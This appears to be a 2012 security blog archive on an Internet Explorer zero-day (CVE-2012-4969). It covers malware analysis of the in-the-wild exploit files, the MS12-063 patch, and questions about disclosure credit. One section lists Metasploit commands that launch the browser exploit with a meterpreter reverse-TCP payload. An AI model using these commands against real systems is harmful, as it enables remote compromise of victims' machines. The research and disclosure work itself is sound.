Tag Archives: Microsoft

Microsoft Internet Explorer 0Day reported by ZDI to Microsoft?

As you may know, Microsoft has released the MS12-063 out-of-band security bulletin, which fixes 5 security vulnerabilities, including CVE-2012-4969, the Internet Explorer 0day I discovered last weekend being exploited in the wild by the Nitro gang.

After analyzing MS12-063 and all the vulnerabilities fixed in this bulletin, I was surprised to see that CVE-2012-4969 was credited to an anonymous researcher working with TippingPoint’s Zero Day Initiative.

Microsoft thanks the following for working with us to help protect customers: An anonymous researcher, working with TippingPoint’s Zero Day Initiative, for reporting the execCommand Use After Free Vulnerability (CVE-2012-4969)

So, to be clear, this means that this vulnerability was discovered by another researcher before my discovery, reported to ZDI, which then reported it to Microsoft. Hum… Microsoft has not yet provided the ZDI reference, and ZDI has not communicated about it either.

Based on NIST NVD, CVE-2012-4969 has a CVSS base score of 9.3, because the “AccessComplexity” metric is set to “Medium“. But I really think that “AccessComplexity” should be set to “Low”, which would result in a CVSS base score of 10.

If you take a look at all the ZDI upcoming advisories for Microsoft, all related ZDI-CANs reported by an anonymous researcher have a maximum CVSS base score of 7.5.

Below are all the ZDI-CANs reported by an anonymous researcher:

  • ZDI-CAN-1586 was reported on 2012-07-24, with a CVSS of 7.5
  • ZDI-CAN-1574 was reported on 2012-07-24, with a CVSS of 7.5
  • ZDI-CAN-1373 was reported on 2012-07-24, with a CVSS of 7.5
  • ZDI-CAN-1526 was reported on 2012-03-14, with a CVSS of 7.5
  • ZDI-CAN-1525 was reported on 2012-03-14, with a CVSS of 7.5
  • ZDI-CAN-1524 was reported on 2012-03-14, with a CVSS of 7.5
  • ZDI-CAN-1523 was reported on 2012-03-14, with a CVSS of 7.5
  • ZDI-CAN-1520 was reported on 2012-03-14, with a CVSS of 7.5
  • ZDI-CAN-1402 was reported on 2011-11-29, with a CVSS of 7.5
  • ZDI-CAN-1281 was reported on 2011-05-25, with a CVSS of 7.5

None of these ZDI-CAN vulnerabilities have a CVSS base score of 9.3 or 10. But maybe ZDI doesn’t apply good practices to CVSS scoring?

If you take a look at the MS12-063 CVE assignments reported by anonymous researchers working with ZDI:

  • CVE-2012-4969, the one in question, was assigned on 2012-09-18
  • CVE-2012-2557 was assigned on 2012-05-09
  • CVE-2012-1529 was assigned on 2012-03-08

If CVE-2012-4969 was reported to ZDI by an anonymous researcher, the vulnerability was known by Microsoft for a minimum of 1 month and a maximum of 462 days, an average time of 168.4 days…

You may know that ZDI (an HP-related company) uses the reported vulnerabilities to create IPS filters in order to protect HP Digital Vaccine customers. So even if the affected vendor has not yet released a patch, HP Digital Vaccine customers are “protected” against the potential threat. In other words, all the potential 0days reported to ZDI are modeled as filters.

Our security research team develops new Digital Vaccine® protection filters that address the latest vulnerabilities and are constantly distributed to our customers’ intrusion prevention systems.

You may also know that ZDI is part of the zero-day exploit market, and that the principal objective of this market is to make money by selling 0days to interested persons or organizations.

Now, just jump back to the end of August: do you remember the Java 0day which was also exploited in the wild by the Nitro gang? Take a look at the Oracle Security Alert for CVE-2012-4681: who is credited? James Forshaw (tyranid) via TippingPoint. Hum… One more time TippingPoint is present, coincidence?

An interesting Guardian newspaper article regarding the Java 0day pointed to the possibility that:

Although little is known about the group, it is thought that they did not discover the flaw themselves but may have bought it from a commercial group that specialises in selling details about “zero-day” flaws in software that can be used to penetrate commercial or government systems, even when they have the most up-to-date cybersecurity in place.

This is beginning to be too many coincidences, and I would like to know:

  • Is the Microsoft credit an error?
  • Has ZDI sold these 0days?
  • Have HP Digital Vaccine filters been reversed?
  • Is ZDI the victim of a leak?
  • Is ZDI the victim of an internal threat? Lots of ZDI employees have left the company recently.

Updates

09/22:

Robert Graham (@ErrataRob) has written an interesting article, “0-day leaks from IPS”, regarding my question “Have HP Digital Vaccine filters been reversed?“.

MS12-063 Out-of-Band Microsoft Security Update for Internet Explorer Fixes 0day

Microsoft has released, on 21 September 2012, as planned in its “Microsoft Security Bulletin Advance Notification for September 2012“, one security bulletin, MS12-063, in order to fix 5 security vulnerabilities, including the 0day vulnerability I discovered last weekend.

MS12-063 bulletin is classified as Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers.

CVE-2012-1529 has an unknown CVSS base score and was discovered and privately reported by an anonymous researcher working with VeriSign iDefense Labs. The CVE number was assigned on 2012-03-08.

CVE-2012-2546 has an unknown CVSS base score and was discovered and privately reported by Rosario Valotta. The CVE number was assigned on 2012-05-09.

CVE-2012-2548 has an unknown CVSS base score and was discovered and privately reported by Stephen Fewer of Harmony Security, working with TippingPoint’s Zero Day Initiative. The CVE number was assigned on 2012-05-09.

CVE-2012-2557 has an unknown CVSS base score and was discovered and privately reported by an anonymous researcher working with TippingPoint’s Zero Day Initiative. The CVE number was assigned on 2012-05-09.

CVE-2012-4969 has a CVSS base score of 9.3 and was, according to Microsoft, discovered and privately reported by an anonymous researcher working with TippingPoint’s Zero Day Initiative, and to Mitre. The CVE number was assigned on 2012-09-18. Something is wrong with this credit; I will write another blog post about this story.

I advise you to update as soon as possible.

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Timeline:

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability on 2012-09-14
Advanced details of the vulnerability provided by binjo on 2012-09-16
Metasploit PoC provided on 2012-09-17

PoC provided by:

unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s):

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Affected version(s):

IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP Pro SP3 with:

Internet Explorer 8

Description:

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands:

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Zero-Day Season Is Really Not Over Yet

I can confirm that the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is currently being exploited in the wild.

First, I would like to thank the nice people (@binjo, @_sinn3r and all the guys of the Metasploit IRC channel on freenode) who helped me to understand and go further in my investigations.

Second, I would like to clarify some points:

  • I wasn’t a target of the 0day; I tested it in my lab. This misunderstanding was introduced by Reuters in their press release.
  • I did this research on my personal time, and it is not linked with my professional activities. This misunderstanding was introduced by Reuters in their press release.
  • I don’t pin the responsibility on the Nitro gang; if you read my blog post, you will see that I found coincidences.
  • I don’t know the timeline of the vulnerability, including when it was discovered and how long it has been exploited.

Since the release of the Java SE 7 0day, I have been monitoring some of the infected servers used by the alleged Nitro gang (take a look at the updates at the end of the blog post). On the morning of 14 September, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).

As seen in the following screenshot, 4 files were hosted in this folder, and, being a curious man, I downloaded everything to see what these files were about.

I tested these files on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Surprise: they dropped files on my test computer (see the demonstration video below)! A new 0day? I then decided to take a deeper look at the grabbed files.

exploit.html

This file is recognized as an HTML file and is detected by 0 anti-viruses on VirusTotal (9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5).

“exploit.html” is the entry point of the attack. This file creates an array of “img” elements and loads the “Moh2010.swf” Flash file.

Moh2010.swf

This file is recognized as a Macromedia Flash Player movie and is detected by 0 anti-viruses on VirusTotal (70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125).

You can observe that the file is packed by DoSWF and that it is decompressed in memory. After decompression, the “Moh2010.swf” file sprays the heap and evals an iframe pointing to the “Protect.html” file.

The ActionScript embedded in the original packed SWF file is also interesting; you will see some special encoding (Chinese?).

The decoded SWF file is known as “Exploit:SWF/CVE-2010-2884.B” or “SWF:Dropper” on VirusTotal (dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f) and is detected by only 3/34 anti-viruses. Thanks to binjo.

During exploitation, this file also checks whether the web site is present in the Flash Website Storage Settings panel, so as to no longer load the “Protect.html” file. This means that once infected, the user will no longer be exploited on further visits to the web site.

Display on the first visit

Characters displayed on the first visit

Display on successful exploitation

Display on further visits

Protect.html

This file is recognized as an HTML file and is detected by 0 anti-viruses on VirusTotal (2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265).

If you take a look at the source code, you can see interesting JavaScript code which manipulates the “img” array created by “exploit.html“.

You will also see that tests are done in order to target Windows XP 32-bit and Internet Explorer 7 or 8.

111.exe

This file is recognized as an Autodesk FLIC image file and is detected by 0 anti-viruses on VirusTotal (a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9).

Submitted to Malware Tracker (baabd0b871095138269cf2c53b517927), this file looks suspicious and requires further investigation. “111.exe” is packed, and after decoding the file is still not detected by any anti-virus on VirusTotal (a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812). But with a Malwr analysis, you can see that this file is recognized as installing a program to run automatically at logon.

Conclusion

The guys who developed this new 0day were not happy to have been caught; they removed all the files from the source server 2 days after my discovery. Even more interesting, they also removed a Java 0day variant from other folders.

I also submitted all this material to different people in order to confirm the strangeness of this exploit, and we got some good feedback.

Updates

Sunday 09/16:

The Metasploit team is planning to release an exploit module on Monday. This module seems to work very well.

Monday 09/17:

Metasploit has released an exploit module, “ie_execcommand_uaf“, and this module works for IE 7/8/9 on XP/Vista/7.

AlienVault Labs has provided some additional information regarding the DoSWF file and the C&C server, aka “12.163.32.15“.

Microsoft has released MSA-2757760 and recommends installing EMET (Enhanced Mitigation Experience Toolkit) 3.0 and other mitigation solutions.

Tuesday 09/18:

AlienVault Labs has provided more details on the potential source of the attack.

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

Wednesday 09/19:

AlienVault Labs has reported a variant of the “Protect.html” file, named “Dodge.html“, which is now also infecting Windows 7 32-bit running Java 6 with Internet Explorer 9, and confirms the usage of the 0day in targeted attacks.

Microsoft proposes a Fix it solution, KB2757760, “Prevent Memory Corruption via ExecCommand in Internet Explorer“, that prevents exploitation of this issue.

Microsoft has published an advance notification, “Microsoft Security Bulletin Advance Notification for September 2012”, for one out-of-band security bulletin that Microsoft intends to release on September 21, 2012. The bulletin will address security vulnerabilities in Internet Explorer. The vulnerability also affects Internet Explorer on Windows Server 2003 and 2008.

Friday 09/21:

Microsoft has released the promised update MS12-063 in order to fix the 0day vulnerability. If you use Internet Explorer, I advise you to update as soon as possible!